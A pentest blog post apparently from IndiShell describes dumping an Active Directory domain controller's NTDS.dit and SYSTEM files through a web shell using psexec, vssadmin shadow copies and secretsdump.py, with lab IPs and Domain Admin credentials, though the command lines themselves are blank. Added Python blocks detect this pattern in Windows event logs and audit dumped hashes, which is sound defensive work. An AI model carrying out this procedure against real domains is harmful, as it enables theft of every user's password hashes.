2018-12-06

Remotely dump "Active Directory Domain Controller" machine user database using web shell

Hello All,

This time I want to share something related to the Windows Active Directory (AD) environment.
I am going to demonstrate how to dump the Windows Active Directory user database using only a web shell.
Consider a case during a pentest where the pentester has obtained Domain Admin credentials and web shell access on one of the machines joined to the Windows Active Directory forest, tries to get a reverse shell and for some reason cannot (say the network firewall does not allow it), but the pentest goal is to dump the AD user database, i.e. the users and NTLM password hashes of the AD environment.
I faced the same issue during a pentest (I did not have a server with a public IP :P). After playing around with this issue a little, I found a way to achieve the above goal using only a web shell, provided we have AD Domain Admin credentials.
Here the assumptions are as follows:

1. AD Domain Controller machine (queen.DC1.indishell.lab - 192.168.56.200)
2. Compromised Windows machine joined to the AD domain (LABONE - 192.168.56.101)
3. Windows AD Domain Admin credentials already obtained (using any exploit; in my case I got the Domain Admin password using the legendary "MS14-025" exploit)

Now I have web shell access on the domain-joined Windows machine "LABONE" with IP "192.168.56.101", and a Domain Admin account with user name "user1" and password "ica_1046".

In this case I will be using 2 binaries:
1. psexec.exe <- Windows Sysinternals tool for running commands on remote machines
2. vssadmin <- built-in command to create/delete volume shadow copies of a Windows drive

If we manage to run the "vssadmin" command on the Windows AD Domain Controller, it will create a volume shadow copy of the "C" drive, and from that shadow copy we can copy the "ntds.dit" and "SYSTEM" files of the Domain Controller (the live copies are locked while the DC is running, which is why the shadow copy is needed).
To achieve this we will use "psexec.exe", which can execute commands on remote Windows machines when we specify the target machine IP, the Domain Admin username and password, and the "elevated" option (-h).
We upload psexec.exe to the Windows machine "LABONE" using the web shell. From the web shell we then run psexec with the AD Domain Controller IP, the Domain Admin username and password, and the "vssadmin" command.
psexec will execute the vssadmin command on the Domain Controller remotely. After the "C" drive shadow copy is created, we copy "ntds.dit" and "SYSTEM" from the shadow copy to the machine where we have web shell access, i.e. the domain machine "LABONE". This is also done with psexec: we again give it the Domain Controller IP and the Domain Admin credentials, this time with a "copy" command that copies ntds.dit and SYSTEM from the shadow copy to the LABONE machine over SMB. I will copy the files into the same directory where I placed the psexec binary on "LABONE".

General command for using the "psexec" binary to execute a command on a remote host:

In my case the values were:
remote_IP: 192.168.56.200 (queen.DC1.indishell.lab)
user_name: user1
password_of_the_user: ica_1046

I have a web shell on the Windows domain machine "LABONE" and have uploaded the psexec binary to the server.


First I check whether any shadow copy of the "C" drive already exists. The command to list the available volume shadow copies is:

Here the web shell cannot show all the output of a command executed by psexec on the remote host, so I redirect the command's output to the machine "LABONE" (where I have web shell access). I will direct the output into the directory "C:\xampp\htdocs\box\ps\".
The command to perform this task is:
 
 
The web shell shows that psexec is executing the command on the remote Windows AD Domain Controller. If everything goes fine we will get a file named "out.txt" in the directory "C:\xampp\htdocs\box\ps", containing the output of the "vssadmin list shadows" command executed on the Domain Controller (192.168.56.200).


Yes, the file is in the directory. Let's check the content of "out.txt".


The content of "out.txt" shows that the target Domain Controller does not have any volume shadow copy yet.

Let's create a shadow copy of the "C" drive so that we can take the "ntds.dit" and "SYSTEM" files from it.
The command to create a volume shadow copy of the C drive is:


One important thing to keep in mind: we need the name of the newly created volume shadow copy of the "C" drive, and it is printed in the output of the command, so we redirect the output of the above command to the machine on which we have web shell access.
To copy the "ntds.dit" and "SYSTEM" files from the target machine we need the name of that shadow copy.
The final command is:


In the above command, psexec executes a command on the Windows AD Domain Controller (192.168.56.200) to create a shadow copy of the "C" drive and then redirects the output of that command to the machine "LABONE" into the file "C:\xampp\htdocs\box\ps\out.txt".


The content of "out.txt" tells us the location of the shadow copy.


In the above screenshot we can see that the shadow copy volume name is "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\".

The locations of the "ntds.dit" and "SYSTEM" files are:

"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"

"shadow_copy_volume_name\Windows\System32\config\SYSTEM"

In my case they are:

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"

Let's copy the "ntds.dit" file from the target Windows AD Domain Controller using the command below:


This command copies the "ntds.dit" file from the remote machine with IP "192.168.56.200" to the machine "LABONE" with IP "192.168.56.101", into the directory "C:\xampp\htdocs\box\ps\".


And yes, the web shell shows that 1 file has been copied from the target DC to my machine. Let's confirm by checking whether the directory "C:\xampp\htdocs\box\ps" contains the "ntds.dit" file.


Yes, it has been copied to the "LABONE" machine on which I have web shell access.

And finally, copy the "SYSTEM" file as well using the command below:



The command executed successfully and the web shell shows the "1 file copied" message. Let's check for the "SYSTEM" file as well.


And that's all. We finally have both files on the "LABONE" machine, from where we can download them using the web shell.
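From the defender's side, every step of the procedure above leaves a trace on the Domain Controller: PsExec installs its PSEXESVC service (System log event 7045), "vssadmin create shadow" appears as a process creation (Security event 4688 with command-line auditing enabled), and the copy of NTDS.dit / SYSTEM references a HarddiskVolumeShadowCopy path. The following Python detection is an added example, not code from the original post or from any product; the event records in SAMPLE_EVENTS are constructed for illustration (host names and paths are made up, the field names follow the Windows event channels), and the rule names are my own.

```python
"""Flag the PsExec + vssadmin shadow-copy pattern from the walkthrough above
in Windows event records.  Added example, not from the original post; the
records below are constructed (field names follow the System/Security
channels, hosts and paths are made up) and a live collector would replace
SAMPLE_EVENTS with real records."""
import re

# Each record: (channel, event id, selected fields of the event).
# Constructed sample: what a DC would log during the procedure, plus one
# benign "vssadmin list shadows" run by a backup account on another host.
SAMPLE_EVENTS = [
    # PsExec installs its helper service on the target (default name PSEXESVC).
    ("System", 7045, {"Computer": "queen.DC1.indishell.lab",
                      "ServiceName": "PSEXESVC",
                      "ImagePath": r"%SystemRoot%\PSEXESVC.exe"}),
    # 4688 carries CommandLine only if command-line auditing is enabled.
    ("Security", 4688, {"Computer": "queen.DC1.indishell.lab",
                        "SubjectUserName": "user1",
                        "NewProcessName": r"C:\Windows\System32\vssadmin.exe",
                        "CommandLine": "vssadmin list shadows"}),
    ("Security", 4688, {"Computer": "queen.DC1.indishell.lab",
                        "SubjectUserName": "user1",
                        "NewProcessName": r"C:\Windows\System32\vssadmin.exe",
                        "CommandLine": "vssadmin create shadow /for=C:"}),
    ("Security", 4688, {"Computer": "queen.DC1.indishell.lab",
                        "SubjectUserName": "user1",
                        "NewProcessName": r"C:\Windows\System32\cmd.exe",
                        "CommandLine": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit \\192.168.56.101\ps\ntds.dit"}),
    ("Security", 4688, {"Computer": "fileserver.DC1.indishell.lab",
                        "SubjectUserName": "svc_backup",
                        "NewProcessName": r"C:\Windows\System32\vssadmin.exe",
                        "CommandLine": "vssadmin list shadows"}),
]

PSEXEC_SERVICE = re.compile(r"psexesvc", re.IGNORECASE)
# Listing shadows is routine; creating one is the step worth alerting on.
VSS_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.IGNORECASE)
# The two files the walkthrough copies, read from a shadow-copy device path.
SHADOW_SECRETS = re.compile(
    r"HarddiskVolumeShadowCopy\d+\\Windows\\(?:NTDS\\ntds\.dit|System32\\config\\SYSTEM)",
    re.IGNORECASE,
)


def analyze(events):
    """Return one finding dict per matched rule, in event order."""
    findings = []
    for channel, event_id, f in events:
        host = f.get("Computer", "?")
        if channel == "System" and event_id == 7045:
            if PSEXEC_SERVICE.search(f.get("ServiceName", "")) or \
               PSEXEC_SERVICE.search(f.get("ImagePath", "")):
                findings.append({"host": host, "rule": "psexec_service_install",
                                 "detail": f.get("ServiceName")})
        elif channel == "Security" and event_id == 4688:
            cmd = f.get("CommandLine", "")
            user = f.get("SubjectUserName")
            if VSS_CREATE.search(cmd):
                findings.append({"host": host, "rule": "shadow_copy_created",
                                 "user": user, "detail": cmd})
            if SHADOW_SECRETS.search(cmd):
                findings.append({"host": host, "rule": "ad_secrets_read_from_shadow",
                                 "user": user, "detail": cmd})
    return findings


def correlate(findings):
    """Hosts where a PsExec service install and a shadow-copy creation both
    occurred: the combination is the signature of the procedure above."""
    rules_by_host = {}
    for fd in findings:
        rules_by_host.setdefault(fd["host"], set()).add(fd["rule"])
    wanted = {"psexec_service_install", "shadow_copy_created"}
    return sorted(h for h, rules in rules_by_host.items() if wanted <= rules)


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for fd in found:
        print(f"[{fd['rule']}] {fd['host']}: {fd['detail']}")
    print("hosts with the full pattern:", correlate(SAMPLE_EVENTS and found))
```

The benign "vssadmin list shadows" from the backup account produces no finding, so the rules only fire on shadow creation, on a PsExec service install, and on a read of NTDS.dit or SYSTEM through a shadow-copy device path; the correlation step is what separates an administrator's occasional PsExec use from this exact sequence.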

Now we can extract the domain, user name, RID, LM and NT hashes from the "ntds.dit" and "SYSTEM" files using the secretsdump.py Python script (part of Impacket).

The command to dump the user id, LM and NT hashes is:



The result will look something like this:
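secretsdump.py prints one credential per line in the form domain\user:rid:lmhash:nthash:::, mixed with status lines and Kerberos key lines. What a defender or auditor does with such a dump is look for accounts with blank passwords, accounts that still have an LM hash stored, and accounts sharing the same NT hash (password reuse). The parser and audit below are an added example, not part of the original post or of Impacket; the SAMPLE_DUMP text is constructed, and every hash value in it other than the two well-known empty-string constants is a made-up placeholder.

```python
"""Audit the user:rid:lm:nt::: lines that secretsdump.py prints for blank
passwords, stored LM hashes and NT hash reuse.  Added example, not part of
the original post or of Impacket; SAMPLE_DUMP is constructed and all hash
values except the empty-string constants are fake placeholders."""
import re
from collections import defaultdict

# LM and NT hashes of the empty string: what an account shows when LM
# storage is disabled (LM field) or the password is blank (NT field).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# domain\ prefix is optional (machine accounts are printed without it).
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::\s*$",
    re.IGNORECASE,
)

# Constructed sample dump (placeholder hashes, made-up accounts).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
indishell.lab\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
indishell.lab\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
indishell.lab\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
indishell.lab\\user1:1104:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
indishell.lab\\legacyapp:1105:33333333333333333333333333333333:44444444444444444444444444444444:::
QUEEN$:1000:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
[*] Kerberos keys grabbed
indishell.lab\\krbtgt:aes256-cts-hmac-sha1-96:66666666666666666666666666666666
"""


def parse_secretsdump(text):
    """One record per credential line; status and Kerberos key lines do
    not have the seven-field shape and are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        records.append(rec)
    return records


def audit(records):
    """Group the weaknesses an auditor reports back to the AD owners."""
    blank = [r["user"] for r in records if r["nt"] == EMPTY_NT]
    lm_stored = [r["user"] for r in records if r["lm"] != EMPTY_LM]
    users_by_nt = defaultdict(list)
    for r in records:
        # Machine accounts ($) have random passwords; exclude from reuse check.
        if not r["user"].endswith("$"):
            users_by_nt[r["nt"]].append(r["user"])
    reuse = sorted(users for users in users_by_nt.values() if len(users) > 1)
    return {"blank_password": blank,
            "lm_hash_stored": lm_stored,
            "nt_hash_reuse": reuse}


if __name__ == "__main__":
    report = audit(parse_secretsdump(SAMPLE_DUMP))
    for category, users in report.items():
        print(f"{category}: {users}")
```

On the constructed dump this reports Guest as a blank password, legacyapp as still storing an LM hash, and Administrator together with user1 as sharing one NT hash, which is exactly the kind of finding (a Domain Admin reusing a password on an ordinary account) that makes an attack like the one in this post possible in the first place.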


Thanks for reading.

Special thanks to Sean Metcalf, OJ, Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n, Anurag Srivastava, vivek chauhan, Spirited wolf


--==[[ With Love from Team IndiShell ]]==--
                             
 --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)


